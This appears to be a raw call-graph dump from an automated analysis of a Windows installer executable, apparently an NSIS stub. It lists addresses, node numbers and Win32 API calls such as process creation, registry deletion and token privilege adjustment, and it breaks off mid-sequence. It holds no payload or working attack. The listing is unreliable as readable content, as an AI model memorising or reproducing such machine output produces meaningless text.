MessageBoxIndirectW 3724->3726 3725->3677 3726->3725 3728 405dc1 ReadFile 3727->3728 3729 403149 3728->3729 3729->3706 3729->3707 3729->3709 3731 4067cc 3730->3731 3732 4067d4 3730->3732 3731->3717 3732->3731 3733 406864 GlobalAlloc 3732->3733 3734 40685b GlobalFree 3732->3734 3735 4068d2 GlobalFree 3732->3735 3736 4068db GlobalAlloc 3732->3736 3733->3731 3733->3732 3734->3733 3735->3736 3736->3731 3736->3732 3737->3702 4261 402570 4262 402c37 17 API calls 4261->4262 4263 402577 4262->4263 4266 405d3e GetFileAttributesW CreateFileW 4263->4266 4265 402583 4266->4265 3738 401b71 3739 401bc2 3738->3739 3740 401b7e 3738->3740 3741 401bc7 3739->3741 3742 401bec GlobalAlloc 3739->3742 3743 4022de 3740->3743 3748 401b95 3740->3748 3751 401c07 3741->3751 3759 40624c lstrcpynW 3741->3759 3744 40626e 17 API calls 3742->3744 3745 40626e 17 API calls 3743->3745 3744->3751 3747 4022eb 3745->3747 3753 4058ae MessageBoxIndirectW 3747->3753 3757 40624c lstrcpynW 3748->3757 3749 401bd9 GlobalFree 3749->3751 3752 401ba4 3758 40624c lstrcpynW 3752->3758 3753->3751 3755 401bb3 3760 40624c lstrcpynW 3755->3760 3757->3752 3758->3755 3759->3749 3760->3751 3761 4024f2 3762 402c77 17 API calls 3761->3762 3763 4024fc 3762->3763 3764 402c15 17 API calls 3763->3764 3765 402505 3764->3765 3766 402521 RegEnumKeyW 3765->3766 3767 40252d RegEnumValueW 3765->3767 3769 402885 3765->3769 3770 402549 RegCloseKey 3766->3770 3768 402542 3767->3768 3767->3770 3768->3770 3770->3769 4267 401a72 4268 402c15 17 API calls 4267->4268 4269 401a78 4268->4269 4270 402c15 17 API calls 4269->4270 4271 401a20 4270->4271 3772 401573 3773 401583 ShowWindow 3772->3773 3774 40158c 3772->3774 3773->3774 3775 40159a ShowWindow 3774->3775 3776 402abf 3774->3776 3775->3776 4272 4042f5 lstrcpynW lstrlenW 4273 4014f5 SetForegroundWindow 4274 402abf 4273->4274 4282 401e77 4283 402c37 17 API calls 4282->4283 4284 401e7d 4283->4284 4285 402c37 17 API calls 4284->4285 4286 401e86 4285->4286 4287 402c37 17 API calls 4286->4287 4288 401e8f 4287->4288 4289 402c37 17 API calls 4288->4289 4290 401e98 4289->4290 4291 401423 24 API calls 4290->4291 4292 401e9f 4291->4292 4299 405874 ShellExecuteExW 4292->4299 4294 401ee1 4295 402885 4294->4295 4296 4066d7 5 API calls 4294->4296 4297 401efb CloseHandle 4296->4297 4297->4295 4299->4294 3799 40167b 3800 402c37 17 API calls 3799->3800 3801 401682 3800->3801 3802 402c37 17 API calls 3801->3802 3803 40168b 3802->3803 3804 402c37 17 API calls 3803->3804 3805 401694 MoveFileW 3804->3805 3806 4016a0 3805->3806 3807 4016a7 3805->3807 3809 401423 24 API calls 3806->3809 3808 40658f 2 API calls 3807->3808 3811 40224a 3807->3811 3810 4016b6 3808->3810 3809->3811 3810->3811 3812 406012 36 API calls 3810->3812 3812->3806 4078 4020fe 4079 402c37 17 API calls 4078->4079 4080 402105 4079->4080 4081 402c37 17 API calls 4080->4081 4082 40210f 4081->4082 4083 402c37 17 API calls 4082->4083 4084 402119 4083->4084 4085 402c37 17 API calls 4084->4085 4086 402123 4085->4086 4087 402c37 17 API calls 4086->4087 4088 40212d 4087->4088 4089 40216c CoCreateInstance 4088->4089 4090 402c37 17 API calls 4088->4090 4093 40218b 4089->4093 4090->4089 4091 401423 24 API calls 4092 40224a 4091->4092 4093->4091 4093->4092 4094 40247e 4095 402c77 17 API calls 4094->4095 4096 402488 4095->4096 4097 402c37 17 API calls 4096->4097 4098 402491 4097->4098 4099 40249c RegQueryValueExW 4098->4099 4103 402885 4098->4103 4100 4024c2 RegCloseKey 4099->4100 4101 4024bc 4099->4101 4100->4103 4101->4100 4105 406193 wsprintfW 4101->4105 4105->4100 4300 40437e 4301 404396 4300->4301 4308 4044b0 4300->4308 4305 4041e1 18 API calls 4301->4305 4302 40451a 4303 4045e4 4302->4303 4304 404524 GetDlgItem 4302->4304 4310 404248 8 API calls 4303->4310 4306 4045a5 4304->4306 4307 40453e 4304->4307 4309 4043fd 4305->4309 4306->4303 4314 4045b7 4306->4314 4307->4306 4313 404564 SendMessageW LoadCursorW SetCursor 4307->4313 4308->4302 4308->4303 4311 4044eb GetDlgItem SendMessageW 4308->4311 4312 4041e1 18 API calls 4309->4312 4325 4045df 4310->4325 4333 404203 KiUserCallbackDispatcher 4311->4333 4317 40440a CheckDlgButton 4312->4317 4337 40462d 4313->4337 4319 4045cd 4314->4319 4320 4045bd SendMessageW 4314->4320 4316 404515 4334 404609 4316->4334 4331 404203 KiUserCallbackDispatcher 4317->4331 4324 4045d3 SendMessageW 4319->4324 4319->4325 4320->4319 4324->4325 4326 404428 GetDlgItem 4332 404216 SendMessageW 4326->4332 4328 40443e SendMessageW 4329 404464 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4328->4329 4330 40445b GetSysColor 4328->4330 4329->4325 4330->4329 4331->4326 4332->4328 4333->4316 4335 404617 4334->4335 4336 40461c SendMessageW 4334->4336 4335->4336 4336->4302 4340 405874 ShellExecuteExW 4337->4340 4339 404593 LoadCursorW SetCursor 4339->4306 4340->4339 4341 4019ff 4342 402c37 17 API calls 4341->4342 4343 401a06 4342->4343 4344 402c37 17 API calls 4343->4344 4345 401a0f 4344->4345 4346 401a16 lstrcmpiW 4345->4346 4347 401a28 lstrcmpW 4345->4347 4348 401a1c 4346->4348 4347->4348 3162 401f00 3177 402c37 3162->3177 3169 402885 3172 401f2b 3173 401f30 3172->3173 3174 401f3b 3172->3174 3202 406193 wsprintfW 3173->3202 3176 401f39 CloseHandle 3174->3176 3176->3169 3178 402c43 3177->3178 3203 40626e 3178->3203 3181 401f06 3183 4052b0 3181->3183 3184 4052cb 3183->3184 3193 401f10 3183->3193 3185 4052e7 lstrlenW 3184->3185 3186 40626e 17 API calls 3184->3186 3187 405310 3185->3187 3188 4052f5 lstrlenW 3185->3188 3186->3185 3190 405323 3187->3190 3191 405316 SetWindowTextW 3187->3191 3189 405307 lstrcatW 3188->3189 3188->3193 3189->3187 3192 405329 SendMessageW SendMessageW SendMessageW 3190->3192 3190->3193 3191->3190 3192->3193 3194 405831 CreateProcessW 3193->3194 3195 401f16 3194->3195 3196 405864 CloseHandle 3194->3196 3195->3169 3195->3176 3197 4066d7 WaitForSingleObject 3195->3197 3196->3195 3198 4066f1 3197->3198 3199 406703 GetExitCodeProcess 3198->3199 3245 406662 3198->3245 3199->3172 3202->3176 3207 40627b 3203->3207 3204 4064c6 3205 402c64 3204->3205 3236 40624c lstrcpynW 3204->3236 3205->3181 3220 4064e0 3205->3220 3207->3204 3208 406494 lstrlenW 3207->3208 3209 40626e 10 API calls 3207->3209 3213 4063a9 GetSystemDirectoryW 3207->3213 3214 4063bc GetWindowsDirectoryW 3207->3214 3215 4064e0 5 API calls 3207->3215 3216 40626e 10 API calls 3207->3216 3217 406437 lstrcatW 3207->3217 3218 4063f0 SHGetSpecialFolderLocation 3207->3218 3229 40611a 3207->3229 3234 406193 wsprintfW 3207->3234 3235 40624c lstrcpynW 3207->3235 3208->3207 3209->3208 3213->3207 3214->3207 3215->3207 3216->3207 3217->3207 3218->3207 3219 406408 SHGetPathFromIDListW CoTaskMemFree 3218->3219 3219->3207 3227 4064ed 3220->3227 3221 406563 3222 406568 CharPrevW 3221->3222 3225 406589 3221->3225 3222->3221 3223 406556 CharNextW 3223->3221 3223->3227 3225->3181 3226 406542 CharNextW 3226->3227 3227->3221 3227->3223 3227->3226 3228 406551 CharNextW 3227->3228 3241 405b4a 3227->3241 3228->3223 3237 4060b9 3229->3237 3232 40617e 3232->3207 3233 40614e RegQueryValueExW RegCloseKey 3233->3232 3234->3207 3235->3207 3236->3205 3238 4060c8 3237->3238 3239 4060d1 RegOpenKeyExW 3238->3239 3240 4060cc 3238->3240 3239->3240 3240->3232 3240->3233 3242 405b50 3241->3242 3243 405b66 3242->3243 3244 405b57 CharNextW 3242->3244 3243->3227 3244->3242 3246 40667f PeekMessageW 3245->3246 3247 406675 DispatchMessageW 3246->3247 3248 40668f WaitForSingleObject 3246->3248 3247->3246 3248->3198 4349 401000 4350 401037 BeginPaint GetClientRect 4349->4350 4351 40100c DefWindowProcW 4349->4351 4353 4010f3 4350->4353 4354 401179 4351->4354 4355 401073 CreateBrushIndirect FillRect DeleteObject 4353->4355 4356 4010fc 4353->4356 4355->4353 4357 401102 CreateFontIndirectW 4356->4357 4358 401167 EndPaint 4356->4358 4357->4358 4359 401112 6 API calls 4357->4359 4358->4354 4359->4358 4360 401503 4361 40150b 4360->4361 4363 40151e 4360->4363 4362 402c15 17 API calls 4361->4362 4362->4363 3448 402306 3449 40230e 3448->3449 3452 402314 3448->3452 3450 402c37 17 API calls 3449->3450 3450->3452 3451 402322 3454 402330 3451->3454 3455 402c37 17 API calls 3451->3455 3452->3451 3453 402c37 17 API calls 3452->3453 3453->3451 3456 402c37 17 API calls 3454->3456 3455->3454 3457 402339 WritePrivateProfileStringW 3456->3457 4364 404a06 4365 404a32 4364->4365 4366 404a16 4364->4366 4368 404a65 4365->4368 4369 404a38 SHGetPathFromIDListW 4365->4369 4375 405892 GetDlgItemTextW 4366->4375 4371 404a4f SendMessageW 4369->4371 4372 404a48 4369->4372 4370 404a23 SendMessageW 4370->4365 4371->4368 4373 40140b 2 API calls 4372->4373 4373->4371 4375->4370 4376 401f86 4377 402c37 17 API calls 4376->4377 4378 401f8d 4377->4378 4379 406626 5 API calls 4378->4379 4380 401f9c 4379->4380 4381 401fb8 GlobalAlloc 4380->4381 4382 402020 4380->4382 4381->4382 4383 401fcc 4381->4383 4384 406626 5 API calls 4383->4384 4385 401fd3 4384->4385 4386 406626 5 API calls 4385->4386 4387 401fdd 4386->4387 4387->4382 4391 406193 wsprintfW 4387->4391 4389 402012 4392 406193 wsprintfW 4389->4392 4391->4389 4392->4382 3465 403d08 3466 403d20 3465->3466 3467 403e5b 3465->3467 3466->3467 3469 403d2c 3466->3469 3468 403e6c GetDlgItem GetDlgItem 3467->3468 3473 403eac 3467->3473 3472 4041e1 18 API calls 3468->3472 3470 403d37 SetWindowPos 3469->3470 3471 403d4a 3469->3471 3470->3471 3475 403d67 3471->3475 3476 403d4f ShowWindow 3471->3476 3477 403e96 SetClassLongW 3472->3477 3474 403f06 3473->3474 3482 401389 2 API calls 3473->3482 3483 403e56 3474->3483 3536 40422d 3474->3536 3479 403d89 3475->3479 3480 403d6f DestroyWindow 3475->3480 3476->3475 3481 40140b 2 API calls 3477->3481 3485 403d8e SetWindowLongW 3479->3485 3486 403d9f 3479->3486 3484 40416a 3480->3484 3481->3473 3487 403ede 3482->3487 3484->3483 3493 40419b ShowWindow 3484->3493 3485->3483 3490 403e48 3486->3490 3491 403dab GetDlgItem 3486->3491 3487->3474 3492 403ee2 SendMessageW 3487->3492 3488 40140b 2 API calls 3505 403f18 3488->3505 3489 40416c DestroyWindow EndDialog 3489->3484 3558 404248 3490->3558 3494 403ddb 3491->3494 3495 403dbe SendMessageW IsWindowEnabled 3491->3495 3492->3483 3493->3483 3498 403de8 3494->3498 3499 403dfb 3494->3499 3500 403e2f SendMessageW 3494->3500 3509 403de0 3494->3509 3495->3483 3495->3494 3497 40626e 17 API calls 3497->3505 3498->3500 3498->3509 3502 403e03 3499->3502 3503 403e18 3499->3503 3500->3490 3552 40140b 3502->3552 3507 40140b 2 API calls 3503->3507 3504 403e16 3504->3490 3505->3483 3505->3488 3505->3489 3505->3497 3508 4041e1 18 API calls 3505->3508 3527 4040ac DestroyWindow 3505->3527 3539 4041e1 3505->3539 3510 403e1f 3507->3510 3508->3505 3555 4041ba 3509->3555 3510->3490 3510->3509 3512 403f93 GetDlgItem 3513 403fb0 ShowWindow KiUserCallbackDispatcher 3512->3513 3514 403fa8 3512->3514 3542 404203 KiUserCallbackDispatcher 3513->3542 3514->3513 3516 403fda EnableWindow 3521 403fee 3516->3521 3517 403ff3 GetSystemMenu EnableMenuItem SendMessageW 3518 404023 SendMessageW 3517->3518 3517->3521 3518->3521 3521->3517 3543 404216 SendMessageW 3521->3543 3544 403ce9 3521->3544 3547 40624c lstrcpynW 3521->3547 3523 404052 lstrlenW 3524 40626e 17 API calls 3523->3524 3525 404068 SetWindowTextW 3524->3525 3548 401389 3525->3548 3527->3484 3528 4040c6 CreateDialogParamW 3527->3528 3528->3484 3529 4040f9 3528->3529 3530 4041e1 18 API calls 3529->3530 3531 404104 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3530->3531 3532 401389 2 API calls 3531->3532 3533 40414a 3532->3533 3533->3483 3534 404152 ShowWindow 3533->3534 3535 40422d SendMessageW 3534->3535 3535->3484 3537 404245 3536->3537 3538 404236 SendMessageW 3536->3538 3537->3505 3538->3537 3540 40626e 17 API calls 3539->3540 3541 4041ec SetDlgItemTextW 3540->3541 3541->3512 3542->3516 3543->3521 3545 40626e 17 API calls 3544->3545 3546 403cf7 SetWindowTextW 3545->3546 3546->3521 3547->3523 3550 401390 3548->3550 3549 4013fe 3549->3505 3550->3549 3551 4013cb MulDiv SendMessageW 3550->3551 3551->3550 3553 401389 2 API calls 3552->3553 3554 401420 3553->3554 3554->3509 3556 4041c1 3555->3556 3557 4041c7 SendMessageW 3555->3557 3556->3557 3557->3504 3559 404260 GetWindowLongW 3558->3559 3569 4042e9 3558->3569 3560 404271 3559->3560 3559->3569 3561 404280 GetSysColor 3560->3561 3562 404283 3560->3562 3561->3562 3563 404293 SetBkMode 3562->3563 3564 404289 SetTextColor 3562->3564 3565 4042b1 3563->3565 3566 4042ab GetSysColor 3563->3566 3564->3563 3567 4042c2 3565->3567 3568 4042b8 SetBkColor 3565->3568 3566->3565 3567->3569 3570 4042d5 DeleteObject 3567->3570 3571 4042dc CreateBrushIndirect 3567->3571 3568->3567 3569->3483 3570->3571 3571->3569 3572 402388 3573 402390 3572->3573 3574 4023bb 3572->3574 3588 402c77 3573->3588 3576 402c37 17 API calls 3574->3576 3577 4023c2 3576->3577 3584 402cf5 3577->3584 3580 4023a1 3582 402c37 17 API calls 3580->3582 3581 4023cf 3583 4023a8 RegDeleteValueW RegCloseKey 3582->3583 3583->3581 3585 402d0b 3584->3585 3586 402d21 3585->3586 3593 402d2a 3585->3593 3586->3581 3589 402c37 17 API calls 3588->3589 3590 402c8e 3589->3590 3591 4060b9 RegOpenKeyExW 3590->3591 3592 402397 3591->3592 3592->3580 3592->3581 3594 4060b9 RegOpenKeyExW 3593->3594 3595 402d58 3594->3595 3596 402dd0 3595->3596 3597 402d5c 3595->3597 3596->3586 3598 402d7e RegEnumKeyW 3597->3598 3599 402d95 RegCloseKey 3597->3599 3600 402db6 RegCloseKey 3597->3600 3602 402d2a 6 API calls 3597->3602 3598->3597 3598->3599 3601 406626 5 API calls 3599->3601 3600->3596 3603 402da5 3601->3603 3602->3597 3604 402dc4 RegDeleteKeyW 3603->3604 3605 402da9 3603->3605 3604->3596 3605->3596 4400 40190c 4401 401943 4400->4401 4402 402c37 17 API calls 4401->4402 4403 401948 4402->4403 4404 40595a 67 API calls 4403->4404 4405 401951 4404->4405 4413 401d0e 4414 402c15 17 API calls 4413->4414 4415 401d15 4414->4415 4416 402c15 17 API calls 4415->4416 4417 401d21 GetDlgItem 4416->4417 4418 40258c 4417->4418 4419 40190f 4420 402c37 17 API calls 4419->4420 4421 401916 4420->4421 4422 4058ae MessageBoxIndirectW 4421->4422 4423 40191f 4422->4423 4424 401491 4425 4052b0 24 API calls 4424->4425 4426 401498 4425->4426 4427 402592 4428 4025c1 4427->4428 4429 4025a6 4427->4429 4431 4025f5 4428->4431 4432 4025c6 4428->4432 4430 402c15 17 API calls 4429->4430 4440 4025ad 4430->4440 4434 402c37 17 API calls 4431->4434 4433 402c37 17 API calls 4432->4433 4435 4025cd WideCharToMultiByte lstrlenA 4433->4435 4436 4025fc lstrlenW 4434->4436 4435->4440 4436->4440 4437 40263f 4438 402629 4438->4437 4439 405df0 WriteFile 4438->4439 4439->4437 4440->4437 4440->4438 4441 405e1f 5 API calls 4440->4441 4441->4438 4449 403918 4450 403923 4449->4450 4451 403927 4450->4451 4452 40392a GlobalAlloc 4450->4452 4452->4451 3777 401c19 3778 402c15 17 API calls 3777->3778 3779 401c20 3778->3779 3780 402c15 17 API calls 3779->3780 3781 401c2d 3780->3781 3782 401c42 3781->3782 3783 402c37 17 API calls 3781->3783 3784 401c52 3782->3784 3785 402c37 17 API calls 3782->3785 3783->3782 3786 401ca9 3784->3786 3787 401c5d 3784->3787 3785->3784 3789 402c37 17 API calls 3786->3789 3788 402c15 17 API calls 3787->3788 3790 401c62 3788->3790 3791 401cae 3789->3791 3792 402c15 17 API calls 3790->3792 3793 402c37 17 API calls 3791->3793 3794 401c6e 3792->3794 3795 401cb7 FindWindowExW 3793->3795 3796 401c99 SendMessageW 3794->3796 3797 401c7b SendMessageTimeoutW 3794->3797 3798 401cd9 3795->3798 3796->3798 3797->3798 4453 402a9a SendMessageW 4454 402ab4 InvalidateRect 4453->4454 4455 402abf 4453->4455 4454->4455 4456 40281b 4457 402821 4456->4457 4458 402829 FindClose 4457->4458 4459 402abf 4457->4459 4458->4459 4460 40149e 4461 4014ac PostQuitMessage 4460->4461 4462 4022f1 4460->4462 4461->4462 4463 4029a2 4464 402c15 17 API calls 4463->4464 4465 4029a8 4464->4465 4466 4029e8 4465->4466 4467 4029cf 4465->4467 4475 402885 4465->4475 4468 402a02 4466->4468 4469 4029f2 4466->4469 4471 4029d4 4467->4471 4472 4029e5 4467->4472 4470 40626e 17 API calls 4468->4470 4473 402c15 17 API calls 4469->4473 4470->4472 4477 40624c lstrcpynW 4471->4477 4472->4475 4478 406193 wsprintfW 4472->4478 4473->4472 4477->4475 4478->4475 3444 4015a3 3445 402c37 17 API calls 3444->3445 3446 4015aa SetFileAttributesW 3445->3446 3447 4015bc 3446->3447 4486 405224 4487 405234 4486->4487 4488 405248 4486->4488 4489 40523a 4487->4489 4498 405291 4487->4498 4490 405250 IsWindowVisible 4488->4490 4494 405267 4488->4494 4492 40422d SendMessageW 4489->4492 4493 40525d 4490->4493 4490->4498 4491 405296 CallWindowProcW 4495 405244 4491->4495 4492->4495 4499 404b7a SendMessageW 4493->4499 4494->4491 4504 404bfa 4494->4504 4498->4491 4500 404bd9 SendMessageW 4499->4500 4501 404b9d GetMessagePos ScreenToClient SendMessageW 4499->4501 4502 404bd1 4500->4502 4501->4502 4503 404bd6 4501->4503 4502->4494 4503->4500 4513 40624c lstrcpynW 4504->4513 4506 404c0d 4514 406193 wsprintfW 4506->4514 4508 404c17 4509 40140b 2 API calls 4508->4509 4510 404c20 4509->4510 4515 40624c lstrcpynW 4510->4515 4512 404c27 4512->4498 4513->4506 4514->4508 4515->4512 4516 4028a7 4517 402c37 17 API calls 4516->4517 4518 4028b5 4517->4518 4519 4028cb 4518->4519 4520 402c37 17 API calls 4518->4520 4521 405d19 2 API calls 4519->4521 4520->4519 4522 4028d1 4521->4522 4544 405d3e GetFileAttributesW CreateFileW 4522->4544 4524 4028de 4525 402981 4524->4525 4526 4028ea GlobalAlloc 4524->4526 4529 402989 DeleteFileW 4525->4529 4530 40299c 4525->4530 4527 402903 4526->4527 4528 402978 CloseHandle 4526->4528 4545 4032f5 SetFilePointer 4527->4545 4528->4525 4529->4530 4532 402909 4533 4032df ReadFile 4532->4533 4534 402912 GlobalAlloc 4533->4534 4535 402922 4534->4535 4536 402956 4534->4536 4537 4030fa 35 API calls 4535->4537 4538 405df0 WriteFile 4536->4538 4543 40292f 4537->4543 4539 402962 GlobalFree 4538->4539 4540 4030fa 35 API calls 4539->4540 4541 402975 4540->4541 4541->4528 4542 40294d GlobalFree 4542->4536 4543->4542 4544->4524 4545->4532 4546 404c2c GetDlgItem GetDlgItem 4547 404c7e 7 API calls 4546->4547 4556 404e97 4546->4556 4548 404d21 DeleteObject 4547->4548 4549 404d14 SendMessageW 4547->4549 4550 404d2a 4548->4550 4549->4548 4551 404d61 4550->4551 4555 40626e 17 API calls 4550->4555 4553 4041e1 18 API calls 4551->4553 4552 404f7b 4554 405027 4552->4554 4558 404e8a 4552->4558 4564 404fd4 SendMessageW 4552->4564 4557 404d75 4553->4557 4559 405031 SendMessageW 4554->4559 4560 405039 4554->4560 4561 404d43 SendMessageW SendMessageW 4555->4561 4556->4552 4562 404b7a 5 API calls 4556->4562 4580 404f08 4556->4580 4563 4041e1 18 API calls 4557->4563 4565 404248 8 API calls 4558->4565 4559->4560 4567 405052 4560->4567 4568 40504b ImageList_Destroy 4560->4568 4575 405062 4560->4575 4561->4550 4562->4580 4581 404d83 4563->4581 4564->4558 4570 404fe9 SendMessageW 4564->4570 4571 40521d 4565->4571 4566 404f6d SendMessageW 4566->4552 4572 40505b GlobalFree 4567->4572 4567->4575 4568->4567 4569 4051d1 4569->4558 4576 4051e3 ShowWindow GetDlgItem ShowWindow 4569->4576 4574 404ffc 4570->4574 4572->4575 4573 404e58 GetWindowLongW SetWindowLongW 4577 404e71 4573->4577 4585 40500d SendMessageW 4574->4585 4575->4569 4589 404bfa 4 API calls 4575->4589 4593 40509d 4575->4593 4576->4558 4578 404e77 ShowWindow 4577->4578 4579 404e8f 4577->4579 4597 404216 SendMessageW 4578->4597 4598 404216 SendMessageW 4579->4598 4580->4552 4580->4566 4581->4573 4584 404dd3 SendMessageW 4581->4584 4586 404e52 4581->4586 4587 404e20 SendMessageW 4581->4587 4588 404e0f SendMessageW 4581->4588 4584->4581 4585->4554 4586->4573 4586->4577 4587->4581 4588->4581 4589->4593 4590 4051a7 InvalidateRect 4590->4569 4591 4051bd 4590->4591 4599 404b35 4591->4599 4592 4050cb SendMessageW 4596 4050e1 4592->4596 4593->4592 4593->4596 4595 405155 SendMessageW SendMessageW 4595->4596 4596->4590 4596->4595 4597->4558 4598->4556 4602 404a6c 4599->4602 4601 404b4a 4601->4569 4603 404a85 4602->4603 4604 40626e 17 API calls 4603->4604 4605 404ae9 4604->4605 4606 40626e 17 API calls 4605->4606 4607 404af4 4606->4607 4608 40626e 17 API calls 4607->4608 4609 404b0a lstrlenW wsprintfW SetDlgItemTextW 4608->4609 4609->4601 4610 40202c 4611 40203e 4610->4611 4621 4020f0 4610->4621 4612 402c37 17 API calls 4611->4612 4613 402045 4612->4613 4615 402c37 17 API calls 4613->4615 4614 401423 24 API calls 4619 40224a 4614->4619 4616 40204e 4615->4616 4617 402064 LoadLibraryExW 4616->4617 4618 402056 GetModuleHandleW 4616->4618 4620 402075 4617->4620 4617->4621 4618->4617 4618->4620 4630 406695 WideCharToMultiByte 4620->4630 4621->4614 4624 402086 4627 401423 24 API calls 4624->4627 4628 402096 4624->4628 4625 4020bf 4626 4052b0 24 API calls 4625->4626 4626->4628 4627->4628 4628->4619 4629 4020e2 FreeLibrary 4628->4629 4629->4619 4631 402080 4630->4631 4632 4066bf GetProcAddress 4630->4632 4631->4624 4631->4625 4632->4631 4633 40432f lstrlenW 4634 404350 WideCharToMultiByte 4633->4634 4635 40434e 4633->4635 4635->4634 4636 402a2f 4637 402c15 17 API calls 4636->4637 4638 402a35 4637->4638 4639 402a6c 4638->4639 4640 402885 4638->4640 4642 402a47 4638->4642 4639->4640 4641 40626e 17 API calls 4639->4641 4641->4640 4642->4640 4644 406193 wsprintfW 4642->4644 4644->4640 4645 401a30 4646 402c37 17 API calls 4645->4646 4647 401a39 ExpandEnvironmentStringsW 4646->4647 4648 401a4d 4647->4648 4650 401a60 4647->4650 4649 401a52 lstrcmpW 4648->4649 4648->4650 4649->4650 4651 4046b0 4652 4046dc 4651->4652 4653 4046ed 4651->4653 4712 405892 GetDlgItemTextW 4652->4712 4655 4046f9 GetDlgItem 4653->4655 4661 404758 4653->4661 4657 40470d 4655->4657 4656 4046e7 4659 4064e0 5 API calls 4656->4659 4663 404721 SetWindowTextW 4657->4663 4668 405bc8 4 API calls 4657->4668 4658 40483c 4660 4049eb 4658->4660 4714 405892 GetDlgItemTextW 4658->4714 4659->4653 4667 404248 8 API calls 4660->4667 4661->4658 4661->4660 4664 40626e 17 API calls 4661->4664 4666 4041e1 18 API calls 4663->4666 4670 4047cc SHBrowseForFolderW 4664->4670 4665 40486c 4671 405c25 18 API calls 4665->4671 4672 40473d 4666->4672 4673 4049ff 4667->4673 4669 404717 4668->4669 4669->4663 4677 405b1d 3 API calls 4669->4677 4670->4658 4674 4047e4 CoTaskMemFree 4670->4674 4675 404872 4671->4675 4676 4041e1 18 API calls 4672->4676 4678 405b1d 3 API calls 4674->4678 4715 40624c lstrcpynW 4675->4715 4679 40474b 4676->4679 4677->4663 4680 4047f1 4678->4680 4713 404216 SendMessageW 4679->4713 4683 404828 SetDlgItemTextW 4680->4683 4688 40626e 17 API calls 4680->4688 4683->4658 4684 404751 4686 406626 5 API calls 4684->4686 4685 404889 4687 406626 5 API calls 4685->4687 4686->4661 4694 404890 4687->4694 4689 404810 lstrcmpiW 4688->4689 4689->4683 4692 404821 lstrcatW 4689->4692 4690 4048d1 4716 40624c lstrcpynW 4690->4716 4692->4683 4693 4048d8 4695 405bc8 4 API calls 4693->4695 4694->4690 4698 405b69 2 API calls 4694->4698 4700 404929 4694->4700 4696 4048de GetDiskFreeSpaceW 4695->4696 4699 404902 MulDiv 4696->4699 4696->4700 4698->4694 4699->4700 4701 40499a 4700->4701 4703 404b35 20 API calls 4700->4703 4702 4049bd 4701->4702 4704 40140b 2 API calls 4701->4704 4717 404203 KiUserCallbackDispatcher 4702->4717 4705 404987 4703->4705 4704->4702 4707 40499c SetDlgItemTextW 4705->4707 4708 40498c 4705->4708 4707->4701 4710 404a6c 20 API calls 4708->4710 4709 4049d9 4709->4660 4711 404609 SendMessageW 4709->4711 4710->4701 4711->4660 4712->4656 4713->4684 4714->4665 4715->4685 4716->4693 4717->4709 4723 401db3 GetDC 4724 402c15 17 API calls 4723->4724 4725 401dc5 GetDeviceCaps MulDiv ReleaseDC 4724->4725 4726 402c15 17 API calls 4725->4726 4727 401df6 4726->4727 4728 40626e 17 API calls 4727->4728 4729 401e33 CreateFontIndirectW 4728->4729 4730 40258c 4729->4730 4731 401735 4732 402c37 17 API calls 4731->4732 4733 40173c SearchPathW 4732->4733 4734 401757 4733->4734 4735 402835 4736 40283d 4735->4736 4737 402841 FindNextFileW 4736->4737 4740 402853 4736->4740 4738 40289a 4737->4738 4737->4740 4741 40624c lstrcpynW 4738->4741 4741->4740 4742 4014b8 4743 4014be 4742->4743 4744 401389 2 API calls 4743->4744 4745 4014c6 4744->4745 3823 40333d SetErrorMode GetVersion 3824 40337c 3823->3824 3825 403382 3823->3825 3826 406626 5 API calls 3824->3826 3827 4065b6 3 API calls 3825->3827 3826->3825 3828 403398 lstrlenA 3827->3828 3828->3825 3829 4033a8 3828->3829 3830 406626 5 API calls 3829->3830 3831 4033af 3830->3831 3832 406626 5 API calls 3831->3832 3833 4033b6 3832->3833 3834 406626 5 API calls 3833->3834 3835 4033c2 #17 OleInitialize SHGetFileInfoW 3834->3835 3914 40624c lstrcpynW 3835->3914 3838 40340e GetCommandLineW 3915 40624c lstrcpynW 3838->3915 3840 403420 GetModuleHandleW 3841 403438 3840->3841 3842 405b4a CharNextW 3841->3842 3843 403447 CharNextW 3842->3843 3844 403571 GetTempPathW 3843->3844 3854 403460 3843->3854 3916 40330c 3844->3916 3846 403589 3847 4035e3 DeleteFileW 3846->3847 3848 40358d GetWindowsDirectoryW lstrcatW 3846->3848 3926 402ec1 GetTickCount GetModuleFileNameW 3847->3926 3849 40330c 12 API calls 3848->3849 3852 4035a9 3849->3852 3850 405b4a CharNextW 3850->3854 3852->3847 3855 4035ad GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3852->3855 3853 4035f7 3861 405b4a CharNextW 3853->3861 3898 40369a 3853->3898 3909 4036aa 3853->3909 3854->3850 3857 40355c 3854->3857 3859 40355a 3854->3859 3858 40330c 12 API calls 3855->3858 4010 40624c lstrcpynW 3857->4010 3864 4035db 3858->3864 3859->3844 3865 403616 3861->3865 3864->3847 3864->3909 3872 403674 3865->3872 3873 4036da 3865->3873 3866 4037e4 3869 4037ec GetCurrentProcess OpenProcessToken 3866->3869 3870 403868 ExitProcess 3866->3870 3867 4036c4 3868 4058ae MessageBoxIndirectW 3867->3868 3874 4036d2 ExitProcess 3868->3874 3875 403804 LookupPrivilegeValueW AdjustTokenPrivileges 3869->3875 3876 403838 3869->3876 3877 405c25 18 API calls 3872->3877 3878 405819 5 API calls 3873->3878 3875->3876 3879 406626 5 API calls 3876->3879 3880 403680 3877->3880 3881 4036df lstrcatW 3878->3881 3882 40383f 3879->3882 3880->3909 4011 40624c lstrcpynW 3880->4011 3884 4036f0 lstrcatW 3881->3884 3885 4036fb lstrcatW lstrcmpiW 3881->3885 3883 403854 ExitWindowsEx 3882->3883 3886 403861 3882->3886 3883->3870 3883->3886 3884->3885 3888 403717 3885->3888 3885->3909 3889 40140b 2 API calls 3886->3889 3891 403723 3888->3891 3892 40371c 3888->3892 3889->3870 3890 40368f 4012 40624c lstrcpynW 3890->4012 3894 4057fc 2 API calls 3891->3894 3893 40577f 4 API calls 3892->3893 3896 403721 3893->3896 3897 403728 SetCurrentDirectoryW 3894->3897 3896->3897 3899 403743 3897->3899 3900 403738 3897->3900 3954 40395a 3898->3954 4021 40624c lstrcpynW 3899->4021 4020 40624c lstrcpynW 3900->4020 3903 40626e 17 API calls 3904 403782 DeleteFileW 3903->3904 3905 40378f CopyFileW 3904->3905 3911 403751 3904->3911 3905->3911 3906 4037d8 3907 406012 36 API calls 3906->3907 3907->3909 3908 406012 36 API calls 3908->3911 4013 403880 3909->4013 3910 